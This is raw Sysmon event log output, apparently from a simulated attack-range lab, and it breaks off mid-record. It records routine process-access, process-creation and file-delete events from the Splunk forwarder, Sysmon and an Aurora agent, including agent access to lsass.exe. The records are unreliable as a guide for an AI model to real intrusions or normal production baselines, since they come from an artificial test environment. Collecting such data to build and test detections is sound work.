12:18:31.585{E5A8D418-DC43-63C7-0C00-00000000B002}7283236C:\Windows\system32\svchost.exe{E5A8D418-DC44-63C7-1F00-00000000B002}1284C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000015536Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:18:31.585{E5A8D418-DC43-63C7-0C00-00000000B002}7283236C:\Windows\system32\svchost.exe{E5A8D418-DC44-63C7-1F00-00000000B002}1284C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000015535Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:18:31.585{E5A8D418-DC43-63C7-0C00-00000000B002}7283236C:\Windows\system32\svchost.exe{E5A8D418-DC44-63C7-1F00-00000000B002}1284C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000015534Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:18:31.585{E5A8D418-DC43-63C7-0C00-00000000B002}7283236C:\Windows\system32\svchost.exe{E5A8D418-DC44-63C7-1F00-00000000B002}1284C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000015533Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:18:31.585{E5A8D418-DC43-63C7-0C00-00000000B002}7283236C:\Windows\system32\svchost.exe{E5A8D418-DC44-63C7-1F00-00000000B002}1284C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000015532Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:18:31.585{E5A8D418-DC43-63C7-0C00-00000000B002}7283236C:\Windows\system32\svchost.exe{E5A8D418-DC44-63C7-1F00-00000000B002}1284C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000015531Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:18:31.585{E5A8D418-DC43-63C7-0C00-00000000B002}7283236C:\Windows\system32\svchost.exe{E5A8D418-DC44-63C7-1F00-00000000B002}1284C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000015530Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:18:31.585{E5A8D418-DC43-63C7-0500-00000000B002}4163684C:\Windows\system32\csrss.exe{E5A8D418-E397-63C7-EA01-00000000B002}608C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x800000000000000015529Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:18:31.585{E5A8D418-DCC0-63C7-9F00-00000000B002}30963280C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{E5A8D418-E397-63C7-EA01-00000000B002}608C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7424|C:\Windows\System32\KERNELBASE.dll+24890|C:\Windows\System32\KERNELBASE.dll+22e56|C:\Windows\System32\KERNEL32.DLL+1c373|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+e499f1|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1b3255|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1bd30d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1b59b6|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+dd3c14|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1bd79a|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1c0f1c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+dd07d2|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+dd491d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1bb965|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+dc694e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x800000000000000015528Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:18:31.586{E5A8D418-E397-63C7-EA01-00000000B002}608C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{E5A8D418-DC43-63C7-E703-000000000000}0x3e70SystemMD5=82B4C70E6AA15CE4AABB631DA73429A2,SHA256=80ECB7DFA33366FD12D6796A32E0435355F620DA83A8894D00BBAB09197A0F10,IMPHASH=1BDECF92268D3D3EF70015DDFEB0FFB9{E5A8D418-DCC0-63C7-9F00-00000000B002}3096C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x800000000000000040695Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:18:31.770{FE4C2B44-DE08-63C7-F104-00000000AF02}60686500C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-D9F5-63C7-1100-00000000AF02}492C:\Windows\System32\svchost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000019CC5A50) 10341000x800000000000000040694Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:18:31.763{FE4C2B44-DE08-63C7-F104-00000000AF02}60686500C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-D9F5-63C7-1000-00000000AF02}404C:\Windows\system32\svchost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000019CC5A50) 10341000x800000000000000040693Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:18:31.754{FE4C2B44-DE08-63C7-F104-00000000AF02}60686500C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-D9F5-63C7-0F00-00000000AF02}304C:\Windows\System32\svchost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000019CC5A50) 10341000x800000000000000040692Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:18:31.748{FE4C2B44-DE08-63C7-F104-00000000AF02}60686500C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-D9F5-63C7-0E00-00000000AF02}1004C:\Windows\system32\LogonUI.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000019CC5A50) 10341000x800000000000000040691Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:18:31.740{FE4C2B44-DE08-63C7-F104-00000000AF02}60686500C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-D9F5-63C7-0D00-00000000AF02}892C:\Windows\system32\svchost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000019CC5A50) 10341000x800000000000000040690Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:18:31.733{FE4C2B44-DE08-63C7-F104-00000000AF02}60686500C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-D9F5-63C7-0C00-00000000AF02}832C:\Windows\system32\svchost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000019CC5A50) 10341000x800000000000000040689Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:18:31.696{FE4C2B44-DE08-63C7-F104-00000000AF02}60686500C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-D9F3-63C7-0B00-00000000AF02}624C:\Windows\system32\lsass.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000019CC5A50) 10341000x800000000000000040688Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:18:31.691{FE4C2B44-DE08-63C7-F104-00000000AF02}60686500C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-D9F3-63C7-0900-00000000AF02}564C:\Windows\system32\winlogon.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000019CC5A50) 10341000x800000000000000040687Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:18:31.600{FE4C2B44-DA67-63C7-AE00-00000000AF02}49123668C:\Windows\system32\conhost.exe{FE4C2B44-E397-63C7-0E06-00000000AF02}4860C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000040686Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:18:31.600{FE4C2B44-D9F5-63C7-0C00-00000000AF02}832772C:\Windows\system32\svchost.exe{FE4C2B44-DA03-63C7-2000-00000000AF02}2452C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000040685Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:18:31.600{FE4C2B44-D9F5-63C7-0C00-00000000AF02}832772C:\Windows\system32\svchost.exe{FE4C2B44-DA03-63C7-2000-00000000AF02}2452C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000040684Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:18:31.600{FE4C2B44-D9F5-63C7-0C00-00000000AF02}832772C:\Windows\system32\svchost.exe{FE4C2B44-DA03-63C7-2000-00000000AF02}2452C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000040683Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:18:31.600{FE4C2B44-D9F5-63C7-0C00-00000000AF02}832772C:\Windows\system32\svchost.exe{FE4C2B44-DA03-63C7-2000-00000000AF02}2452C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000040682Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:18:31.584{FE4C2B44-D9F3-63C7-0500-00000000AF02}4082524C:\Windows\system32\csrss.exe{FE4C2B44-E397-63C7-0E06-00000000AF02}4860C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x800000000000000040681Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:18:31.584{FE4C2B44-DA67-63C7-AA00-00000000AF02}20924876C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{FE4C2B44-E397-63C7-0E06-00000000AF02}4860C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7424|C:\Windows\System32\KERNELBASE.dll+24890|C:\Windows\System32\KERNELBASE.dll+22e56|C:\Windows\System32\KERNEL32.DLL+1c373|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+e499f1|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1b3255|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1bd30d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1b59b6|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+dd3c14|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1bd79a|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1c0f1c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+dd07d2|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+dd491d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1bb965|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+dc694e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x800000000000000040680Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:18:31.595{FE4C2B44-E397-63C7-0E06-00000000AF02}4860C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{FE4C2B44-D9F3-63C7-E703-000000000000}0x3e70SystemMD5=82B4C70E6AA15CE4AABB631DA73429A2,SHA256=80ECB7DFA33366FD12D6796A32E0435355F620DA83A8894D00BBAB09197A0F10,IMPHASH=1BDECF92268D3D3EF70015DDFEB0FFB9{FE4C2B44-DA67-63C7-AA00-00000000AF02}2092C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x800000000000000040679Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:18:31.584{FE4C2B44-DA75-63C7-F400-00000000AF02}2900NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=4F751952F4CE9AF9DDBCBC9547184336,SHA256=9563EBFC0DA3AD2ABDA069E9F17F48B192ECA753053EA91AA95EA9D9655B8AF7,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000040678Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:18:31.584{FE4C2B44-DA75-63C7-F400-00000000AF02}2900NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\ApplicationMD5=67D1F9DDD9494EB59BD9E474C3428482,SHA256=C1B3F8A444870D0FAD6E7605BB3475C2FB4BC528761DAC65C7A628EC78C4E932,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 10341000x800000000000000040677Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:18:31.433{FE4C2B44-DDF9-63C7-C404-00000000AF02}52005496C:\Windows\Explorer.EXE{FE4C2B44-E326-63C7-F905-00000000AF02}3260C:\Program Files (x86)\Foxit Software\Foxit PDF 